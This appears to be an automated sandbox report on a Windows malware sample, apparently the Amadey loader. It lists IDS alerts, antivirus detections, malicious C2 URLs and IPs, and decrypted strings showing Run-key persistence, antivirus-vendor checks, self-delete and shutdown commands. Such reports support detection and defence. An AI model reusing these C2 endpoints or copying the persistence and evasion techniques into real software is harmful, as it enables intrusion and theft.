2025-03-07T18:11:02.243174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:04.660461+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49717 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:04.906297+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49718 | 104.21.112.1 | 443 | TCP
2025-03-07T18:11:08.175135+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49720 | 104.21.112.1 | 443 | TCP
2025-03-07T18:11:09.151172+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49721 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:12.549223+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49723 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:13.446712+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49725 | 104.21.112.1 | 443 | TCP
2025-03-07T18:11:15.561914+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49727 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:18.578862+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49729 | 104.21.112.1 | 443 | TCP
2025-03-07T18:11:18.579335+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49730 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:18.923250+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49733 | 104.21.48.201 | 443 | TCP
2025-03-07T18:11:20.739410+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49735 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:22.029618+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49737 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:23.283285+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49738 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:27.336987+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49754 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:32.483421+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49759 | 104.21.48.201 | 443 | TCP

2025-03-07T18:11:02.834515+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:05.961015+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49717 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:21.249950+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49735 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:24.126731+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49738 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:28.187466+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49754 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:30.609313+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49733 | 104.21.48.201 | 443 | TCP

2025-03-07T18:11:02.834515+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:21.249950+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49735 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:30.609313+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49733 | 104.21.48.201 | 443 | TCP

2025-03-07T18:11:18.923250+0100 | 2060658 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49733 | 104.21.48.201 | 443 | TCP
2025-03-07T18:11:32.483421+0100 | 2060658 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49759 | 104.21.48.201 | 443 | TCP

2025-03-07T18:11:02.243174+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49715 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:04.660461+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49717 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:09.151172+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49721 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:12.549223+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49723 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:15.561914+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49727 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:18.579335+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49730 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:20.739410+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49735 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:22.029618+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49737 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:23.283285+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49738 | 172.67.214.226 | 443 | TCP
2025-03-07T18:11:27.336987+0100 | 2060570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49754 | 172.67.214.226 | 443 | TCP

2025-03-07T18:11:17.145052+0100 | 2060657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 53182 | 1.1.1.1 | 53 | UDP

2025-03-07T18:11:30.632641+0100 | 2060536 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49834 | 1.1.1.1 | 53 | UDP

2025-03-07T18:10:59.950347+0100 | 2060568 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 52157 | 1.1.1.1 | 53 | UDP

2025-03-07T18:11:18.198830+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.7 | 49732 | TCP

2025-03-07T18:11:18.189608+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49732 | 38.180.229.217 | 80 | TCP

2025-03-07T18:11:18.403814+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49732 | 38.180.229.217 | 80 | TCP

2025-03-07T18:11:19.041806+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49732 | 38.180.229.217 | 80 | TCP

2025-03-07T18:11:18.430082+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.7 | 49732 | TCP

2025-03-07T18:11:10.156835+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49721 | 172.67.214.226 | 443 | TCP

2025-03-07T18:11:17.936234+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49732 | 38.180.229.217 | 80 | TCP

2025-03-07T18:10:08.283658+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 49696 | 176.113.115.6 | 80 | TCP

2025-03-07T18:11:14.039325+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.7 | 49724 | 185.215.113.209 | 80 | TCP

2025-03-07T18:10:13.248048+0100 | 2003305 | 3 | Unknown Traffic | 192.168.2.7 | 49698 | 176.113.115.7 | 80 | TCP
                              2025-03-07T18:10:26.816678+010028033053Unknown Traffic192.168.2.749700176.113.115.780TCP
                              2025-03-07T18:10:35.535287+010028033053Unknown Traffic192.168.2.749702176.113.115.780TCP
                              2025-03-07T18:10:46.475776+010028033053Unknown Traffic192.168.2.749704176.113.115.780TCP
                              2025-03-07T18:10:53.034647+010028033053Unknown Traffic192.168.2.749707176.113.115.780TCP
                              2025-03-07T18:11:00.265223+010028033053Unknown Traffic192.168.2.749713176.113.115.780TCP
                              2025-03-07T18:11:06.075510+010028033053Unknown Traffic192.168.2.749719185.215.113.1680TCP
                              2025-03-07T18:11:12.988257+010028033053Unknown Traffic192.168.2.749726176.113.115.780TCP
                              2025-03-07T18:11:18.259064+010028033053Unknown Traffic192.168.2.749728140.82.121.4443TCP
                              2025-03-07T18:11:24.510774+010028033053Unknown Traffic192.168.2.74973682.115.223.119443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:19.268640+010028033043Unknown Traffic192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:14.039325+010028560961A Network Trojan was detected192.168.2.749724185.215.113.20980TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:11.862081+010028560971A Network Trojan was detected192.168.2.749724185.215.113.20980TCP



                              AV Detection

Source: mQRr8Rkorf.exe | Avira: detected
Source: https://defaulemot.run:443/jUSiazal | Avira URL Cloud: Label: malware
Source: https://fostinjec.today/ | Avira URL Cloud: Label: malware
Source: https://fostinjec.today:443/LksNAz | Avira URL Cloud: Label: malware
Source: https://defaulemot.run:443/jUSiaz | Avira URL Cloud: Label: malware
Source: https://agroecologyguide.digital/api | Avira URL Cloud: Label: malware
Source: https://defaulemot.run/Ky | Avira URL Cloud: Label: malware
Source: https://defaulemot.run/Ry | Avira URL Cloud: Label: malware
Source: https://fostinjec.today/LksNAz | Avira URL Cloud: Label: malware
Source: https://fostinjec.today/: | Avira URL Cloud: Label: malware
Source: https://defaulemot.run/jUSiaz# | Avira URL Cloud: Label: malware
Source: https://defaulemot.run/ | Avira URL Cloud: Label: malware
Source: https://defaulemot.run/jUSiaz | Avira URL Cloud: Label: malware
Source: https://fostinjec.today/wj | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exe | Avira: detection malicious, Label: TR/AD.Nekark.hettb
Source: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exe | Avira: detection malicious, Label: TR/AD.Nekark.aowlo
Source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe | Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe | Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe | Avira: detection malicious, Label: HEUR/AGEN.1329724
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Avira: detection malicious, Label: TR/AD.Nekark.aowlo
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Avira: detection malicious, Label: TR/AD.Nekark.hettb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1329724
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exe | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\han | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\uvwnwebboksg | ReversingLabs: Detection: 42%
Source: mQRr8Rkorf.exe | Virustotal: Detection: 65%
Source: mQRr8Rkorf.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 176.113.115.6
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: /Ni9kiput/index.php
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: S-%lu-
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: bb556cff4a
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: rapes.exe
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Startup
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: rundll32
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Programs
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: %USERPROFILE%
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: cred.dll|clip.dll|
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: cred.dll
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: clip.dll
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: http://
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: https://
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: /quiet
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: /Plugins/
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: &unit=
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: shell32.dll
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: kernel32.dll
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: ProgramData\
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: AVAST Software
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Kaspersky Lab
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Panda Security
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Doctor Web
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 360TotalSecurity
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Bitdefender
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Norton
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Sophos
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Comodo
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: WinDefender
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 0123456789
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: ------
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: ?scr=1
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: ComputerName
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: -unicode-
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: VideoID
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: ProductName
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: CurrentBuild
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: rundll32.exe
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: "taskkill /f /im "
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: " && timeout 1 && del
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: && Exit"
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: " && ren
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Powershell.exe
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: shutdown -s -t 0
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: random
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: Keyboard Layout\Preload
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 00000419
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 00000422
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 00000423
Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String decryptor: 0000043f
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: fostinjec.today/LksNAz
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: begindecafer.world/QwdZdf
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: garagedrootz.top/oPsoJAN
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: modelshiverd.icu/bJhnsj
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: arisechairedd.shop/JnsHY
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: catterjur.run/boSnzhu
Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp | String decryptor: orangemyther.live/IozZ
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00FA2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00922F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00922F1D
Source: mQRr8Rkorf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 82.115.223.119:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: mQRr8Rkorf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: mQRr8Rkorf.exe, mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb,, source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: wextract.pdbGCTL source: mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdbww3 source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: ntdll.pdb source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
